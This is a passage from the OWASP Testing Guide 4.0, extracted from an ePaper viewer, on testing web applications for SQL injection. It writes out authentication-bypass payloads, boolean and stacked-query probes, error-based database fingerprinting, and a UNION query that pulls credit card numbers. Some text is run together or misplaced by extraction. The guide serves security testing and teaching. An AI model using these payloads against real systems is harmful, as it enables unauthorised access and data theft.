4.0

More documents

Recommendations

Info

110Web Application Penetration Testing$password = 1’ or ‘1’ = ‘1The query will be:SELECT * FROM Users WHERE Username=’1’ OR ‘1’ = ‘1’ ANDPassword=’1’ OR ‘1’ = ‘1’If we suppose that the values of the parameters are sent to theserver through the GET method, and if the domain of the vulnerableweb site is www.example.com, the request that we’ll carryout will be:After a short analysis we notice that the query returns a value (orhttp:/www.example.com/index.php?username=1’%20or%20’1’%20=%20’1&password=1’%20or%20’1’%20=%20’1a set of values) because the condition is always true (OR 1=1). Inthis way the system has authenticated the user without knowingthe username and password.In some systems the first row of a user table would be an administratoruser. This may be the profile returned in some cases.Another example of query is the following:SELECT * FROM Users WHERE ((Username=’$username’) AND(Password=MD5(‘$password’)))In this case, there are two problems, one due to the use of theparentheses and one due to the use of MD5 hash function. Firstof all, we resolve the problem of the parentheses. That simplyconsists of adding a number of closing parentheses until we obtaina corrected query. To resolve the second problem, we try toevade the second condition. We add to our query a final symbolthat means that a comment is beginning. In this way, everythingthat follows such symbol is considered a comment. Every DBMShas its own syntax for comments, however, a common symbol tothe greater majority of the databases is /*. In Oracle the symbolis “--”. This said, the values that we’ll use as Username and Passwordare:$username = 1’ or ‘1’ = ‘1’))/*$password = fooThis may return a number of values. Sometimes, the authenticationcode verifies that the number of returned records/results isexactly equal to 1. In the previous examples, this situation wouldbe difficult (in the database there is only one value per user). Inorder to go around this problem, it is enough to insert a SQL commandthat imposes a condition that the number of the returnedresults must be one. (One record returned) In order to reach thisgoal, we use the operator “LIMIT ”, where is thenumber of the results/records that we want to be returned. Withrespect to the previous example, the value of the fields Usernameand Password will be modified as follows:$username = 1’ or ‘1’ = ‘1’)) LIMIT 1/*$password = fooIn this way, we create a request like the follow:http:/www.example.com/index.php?username=1’%20or%20’1’%20=%20’1’))%20LIMIT%201/*&password=fooExample 2 (simple SELECT statement):Consider the following SQL query:SELECT * FROM products WHERE id_product=$id_productConsider also the request to a script who executes the queryabove:http:/www.example.com/product.php?id=10When the tester tries a valid value (e.g. 10 in this case), the applicationwill return the description of a product. A good way to testif the application is vulnerable in this scenario is play with logic,using the operators AND and OR.Consider the request:http:/www.example.com/product.php?id=10 AND 1=2$password = fooIn this way, we’ll get the following query:$password = fooSELECT * FROM products WHERE id_product=10 AND 1=2In this case, probably the application would return some message tellingus there is no content available or a blank page. Then the tester cansend a true statement and check if there is a valid result:(Due to the inclusion of a comment delimiter in the $usernamevalue the password portion of the query will be ignored.)The URL request will be:http:/www.example.com/product.php?id=10 AND 1=1Example 3 (Stacked queries):Depending on the API which the web application is using and the
111Web Application Penetration TestingDBMS (e.g. PHP + PostgreSQL, ASP+SQL SERVER) it may be possibleto execute multiple queries in one call.Consider the following SQL query:SELECT * FROM products WHERE id_product=$id_productA way to exploit the above scenario would be:http:/www.example.com/product.php?id=10; INSERT INTOusers (…)This way is possible to execute many queries in a row and independentof the first query.Fingerprinting the DatabaseEven the SQL language is a standard, every DBMS has its peculiarityand differs from each other in many aspects like special commands,functions to retrieve data such as users names and databases, features,comments line etc.When the testers move to a more advanced SQL injection exploitationthey need to know what the back end database is.1) The first way to find out what back end database is used is by observingthe error returned by the application. Follow are some examples:MySql:You have an error in your SQL syntax; check the manualthat corresponds to your MySQL server version for theright syntax to use near ‘\’’ at line 1Oracle:ORA-00933: SQL command not properly endedMS SQL Server:Microsoft SQL Native Client error ‘80040e14’Unclosed quotation mark after the character stringPostgreSQL:Query failed: ERROR: syntax error at or near“’” at character 56 in /www/site/test.php on line 121.2) If there is no error message or a custom error message, the testercan try to inject into string field using concatenation technique:MySql: ‘test’ + ‘ing’SQL Server: ‘test’ ‘ing’Oracle: ‘test’||’ing’PostgreSQL: ‘test’||’ing’Exploitation TechniquesUnion Exploitation TechniqueThe UNION operator is used in SQL injections to join a query, purposelyforged by the tester, to the original query.The result of the forged query will be joined to the result of theoriginal query, allowing the tester to obtain the values of columnsof other tables. Suppose for our examples that the query executedfrom the server is the following:SELECT Name, Phone, Address FROM Users WHERE Id=$idWe will set the following $id value:$id=1 UNION ALL SELECT creditCardNumber,1,1 FROM Credit-CardTableWe will have the following query:SELECT Name, Phone, Address FROM Users WHERE Id=1UNION ALL SELECT creditCardNumber,1,1 FROM CreditCard-TableWhich will join the result of the original query with all the creditcard numbers in the CreditCardTable table. The keyword ALL isnecessary to get around queries that use the keyword DISTINCT.Moreover, we notice that beyond the credit card numbers, wehave selected other two values. These two values are necessary,because the two queries must have an equal number of parameters/columns,in order to avoid a syntax error.The first detail a tester needs to exploit the SQL injection vulnerabilityusing such technique is to find the right numbers of columnsin the SELECT statement.In order to achieve this the tester can use ORDER BY clause followedby a number indicating the numeration of database’s columnselected:http:/www.example.com/product.php?id=10 ORDER BY 10--If the query executes with success the tester can assume, in thisexample, there are 10 or more columns in the SELECT statement.If the query fails then there must be fewer than 10 columns returnedby the query. If there is an error message available, it wouldprobably be:Unknown column ‘10’ in ‘order clause’After the tester finds out the numbers of columns, the next step isto find out the type of columns. Assuming there were 3 columnsin the example above, the tester could try each column type, usingthe NULL value to help them:http:/www.example.com/product.php?id=10 UNION SELECT1,null,null--If the query fails, the tester will probably see a message like:
Page 1 and 2:
1Testing Guide4.0Project Leaders: M
Page 3 and 4:
Testing Guide Foreword - Table of c
Page 5 and 6:
3Testing Guide Foreword - Table of
Page 7 and 8:
5Testing Guide Foreword - By Eoin K
Page 9 and 10:
7Testing Guide Frontispiece1Testing
Page 11 and 12:
9Testing Guide Introduction2The OWA
Page 13 and 14:
11Testing Guide Introductionvide en
Page 15 and 16:
13Testing Guide IntroductionTesting
Page 17 and 18:
15Testing Guide Introductionlaid on
Page 19 and 20:
17Testing Guide Introductionvalidat
Page 21 and 22:
19Testing Guide IntroductionUSERthe
Page 23 and 24:
21Testing Guide Introductionment wh
Page 25 and 26:
23Testing Guide Introductionoffendi
Page 27 and 28:
25The OWASP Testing Frameworksectio
Page 29 and 30:
27Web Application Penetration Testi
Page 31 and 32:
Page 33 and 34:
Page 35 and 36:
Page 37 and 38:
Page 39 and 40:
Page 41 and 42:
Page 43 and 44:
Page 45 and 46:
Page 47 and 48:
Page 49 and 50:
Page 51 and 52:
Page 53 and 54:
Page 55 and 56:
Page 57 and 58:
Page 59 and 60:
Page 61 and 62: 59Web Application Penetration Testi
Page 103 and 104: 101Web Application Penetration Test
Page 111: 109Web Application Penetration Test
Page 163 and 164:
161Web Application Penetration Test
Page 165 and 166:
Page 167 and 168:
Page 169 and 170:
Page 171 and 172:
Page 173 and 174:
Page 175 and 176:
Page 177 and 178:
Page 179 and 180:
Page 181 and 182:
Page 183 and 184:
Page 185 and 186:
Page 187 and 188:
Page 189 and 190:
Page 191 and 192:
Page 193 and 194:
Page 195 and 196:
Page 197 and 198:
Page 199 and 200:
Page 201 and 202:
Page 203 and 204:
Page 205 and 206:
Page 207 and 208:
Page 209 and 210:
Page 211 and 212:
209same code can be applied to sess
Page 213 and 214:
211ReportingTest IDLowest versionIn
Page 215 and 216:
213ReportingTest IDBusiness Logic T
Page 217 and 218:
215Appendixkajfghlhfkcocafkcjlajldi
Page 219 and 220:
217AppendixTesting - http:/www.nist
Page 221 and 222:
219Cross Site Scripting (XSS)For de
Page 223 and 224:
221LDAP InjectionFor details on LDA
show all

4.0

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?